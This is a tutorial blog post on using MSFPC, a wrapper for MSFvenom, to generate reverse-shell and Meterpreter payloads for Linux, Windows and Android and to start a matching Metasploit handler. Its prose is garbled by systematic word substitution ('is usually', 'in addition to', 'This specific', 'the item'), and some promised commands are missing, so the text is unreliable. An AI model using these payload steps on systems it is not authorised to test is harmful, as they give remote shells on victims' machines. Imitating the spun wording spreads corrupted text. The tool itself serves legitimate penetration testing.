The default tool for payload generation is usually MSFvenom, a Metasploit standalone payload generator as well as encoder. This specific tool is usually an incredibly powerful tool for payload generation, although the item can be difficult in addition to requires a bit of reading for newer users.
Even after the initial reading, generating a basic payload requires quite a bit of typing on the user’s part. Today, we’re going to be looking at easier payload generation with MSFPC.
MSFPC, or the MSFvenom Payload Creator, is usually a bash wrapper over MSFvenom designed to make basic payload creation easier. The goal is usually to allow the user to create payloads as simply as possible, using a minimum of one argument! If you’ve had to use MSFvenom in any capacity within the past, you’ve probably already written a rough shell script to automate frequently generated payloads. Even if you have, This specific tool is usually definitely worth checking out.
With that will out of the way, let’s get commenced!
Step 1: Install MSFPC
First, we’ll need to install MSFPC. The way of doing so will vary slightly by operating system.
If you are installing MSFPC on Kali Linux, the item is usually included within the Kali repos, only set to manual install. You may already hold the item! To check, run the command which msfpc in any terminal emulator. If you don’t hold the item, you can use apt to install the item, as seen below.
apt install msfpc
Option 2: Installing on Generic Linux:
For Linux in addition to Unix variants which do not have This specific package available, we just need to pull the item down through GitHub in our favorite terminal emulator with the following command.
git clone https://github.com/g0tmi1k/mpc; cd mpc
Once we have a clone of the project, we will want to copy the item into a directory that will is usually within our path. The script itself suggests /usr/bin.
I personally don’t like to clutter up /usr/bin. the item’s easier for me to keep track of the tools that will I have compiled or pulled through GitHub by keeping them in their own directory. The decision is usually up to you.
Don’t Miss: How to Install the Metasploit Framework on macOS
In order to install in /usr/bin, change directories to your mpc directory in addition to configure permissions for the script using your terminal, as seen below.
sudo chown root:root msfpc.sh
sudo chmod 755 msfpc.sh
sudo cp msfpc.sh /usr/bin
This specific set of commands alterations the owner in addition to group of the script to root in addition to root, respectively. We then configure the file permissions to 755, or RWXR-XR-X. Finally, we move the script into /usr/bin.
To install to a pentest folder in your home directory, open your terminal in addition to begin the process by typing the following.
chmod 700 msfpc.sh
cp msfpc.sh ~/pentest
You may already have a pentest directory. If This specific is usually the case, there’s no need to make a completely new one. The chmod command alterations the permissions on the script to RWX——. Then we copy the item over into our pentest directory.
We’re not done yet, because This specific directory isn’t a part of our path. In order to fix This specific, we need to edit our .bashrc in our home directory. I used Vim due to This specific, although you can use any editor you like. Type the following.
Once you are editing, add the pentest directory to your path variable with This specific command:
You can leave out the trailing forward slash.
Lastly, we need to either close the terminal window in addition to open a completely new one, or source our modified .bashrc.
MSFPC is usually installed!
Step 2: Create a Linux Payload
today that will we hold the tool installed on our system of choice, let’s get down to generating payloads. For our first payload, we’ll just generate a basic Linux reverse TCP ELF payload using msfpc.sh.
For the first payload, I will be only passing just one argument to MSFPC.
The first thing to notice here is usually that will since I only told msfpc.sh I wanted to generate a Linux payload, in addition to nothing else, msfpc.sh doesn’t know what address we want to connect back to, so the item presents options. WAN is usually my external IP, lo is usually the localhost loop back interface, in addition to ens33 is usually my network interface.
I selected “ens33” in addition to proceeded. This specific can save some time if you don’t have your interface addresses memorized. The CMD output shows the full MSFvenom command that will was executed in order to generate This specific payload. the item’s quite verbose.
Don’t Miss: Getting commenced with Metasploit
Once I generate the payload, I test the item out by setting up a Metasploit handler. However, I don’t have to manually configure This specific handler. Msfpc.sh creates a file named similarly to the payload, with an .rc extension. In order to start a handler due to This specific payload, all I need to do is usually pull the resource file into Metasploit.
sudo msfconsole -q -r ‘/home/barrow/linux-shell-staged-reverse-tcp-443-elf.rc’
The reason for sudo in This specific command is usually because I am a non-privileged user attempting to bind to port 443. The -q argument tells msfconsole to skip the splash screen, in addition to the -r option tells msfconsole to load the resource file. Once that will’s done, I execute the payload, in addition to the item connects back giving me a reverse shell.
Step 3: Create a Windows Payload
For our Windows payload, I thought I’d change the item up in addition to create a lot of different payloads. Msfpc.sh allows for batch-creation of payloads. This specific means that will if I want to create all payloads that will msfpc.sh can create with MSFvenom for a particular target, I can do so easily with the command below.
msfpc.sh windows batch ens33
In This specific command, I’m telling msfpc.sh to create windows payloads using all available combinations, using the IP through my network interface. During the generation process, some errors may come up, although at the end, you will have a collection of Windows payloads in addition to RC files to launch with msfconsole.
We’ve done Windows in addition to Linux. Let’s use msfpc.sh to generate a payload for Android devices. due to This specific example, I’ll generate an Android reverse TCP HTTPS Meterpreter payload. We can do This specific with the command below.
msfpc.sh apk HTTPS ens33
This specific command will create a reverse TCP payload for Android in addition to tunnel the item through HTTPS using my network interface as the IP address.
Msfpc.sh is usually a real timesaver when the item comes to creating basic payloads quickly. The main drawback to This specific script is usually that will the item genuinely only works for basic payloads. You aren’t going to get any encoding to bypass antivirus, although depending on your targets, This specific may not matter. Sometimes, you just need to create a quick payload, drop the item somewhere, in addition to call the item a day. In This specific scenario, msfpc.sh genuinely shines.
Throughout This specific article, I touched on a variety of options for msfpc.sh. There are many different options available, in addition to if you execute the program with the –help verbose, the script will give you a full help file. The help file is usually incredibly informative in addition to easy to read.
As always, stay safe out there in addition to if you have questions or comments, feel free to reach out to me on Twitter @0xBarrow or within the comments below.